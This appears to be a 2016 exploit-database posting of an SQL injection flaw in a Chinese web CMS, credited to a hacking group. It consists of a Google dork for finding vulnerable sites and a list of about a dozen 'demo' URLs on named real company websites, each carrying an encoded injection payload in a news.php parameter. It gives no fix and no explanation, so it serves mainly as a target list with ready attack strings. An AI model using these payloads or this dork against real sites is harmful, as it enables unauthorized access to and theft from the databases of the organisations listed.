###################### # Exploit Title : Foshan Nanhai Dachang shelf Co. SQL injection Vulnerability # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://www.hotlon.com/ # Google Dork : intext:"火龙科技" news.php?cid= # Date: 2016 21 October # Tested On : Win 10 / Google Chrome / Mozilla Firefox # ###################### # demos : # http://www.dcshelf.com/gb/news.php?cid=1%c0%00xa7%c0%a2&lanmu=6 # http://www.pwceramic.com/gb/news.php?cid=33%c0%00xa7%c0%a2 # http://www.diamond.cn/gb/news.php?class_id=5%c0%00xa7%c0%a2 # http://www.chuangyizhongxin.org/gb/news.php?rid=3&ncid=7%c0%00xa7%c0%a2&cid=9 # http://www.jian-tong.com/gb/news.php?cid=3%c0%00xa7%c0%a2 # http://www.china-yuxi.cn/gb/news.php?cid=2%c0%00xa7%c0%a2 # http://www.wldmart.com/gb/news.php?cid=4%c0%00xa7%c0%a2 # http://www.gdjuying.com/gb/news.php?cid=2%c0%00xa7%c0%a2 # http://www.chuangyizhongxin.org/gb/news.php?rid=3&ncid=7%c0%00xa7%c0%a2&cid=9 # http://www.ccjjt.cn/gb/news.php?pageno=7&cid=1%c0%00xa7%c0%a2 # http://www.cimcpark.com/gb/news.php?pageno=4&ncid=1%c0%00xa7%c0%a2 # http://www.blueambre.com/gb/news.php?ncid=2%c0%00xa7%c0%a2 ###################### # discovered by : modiret #####################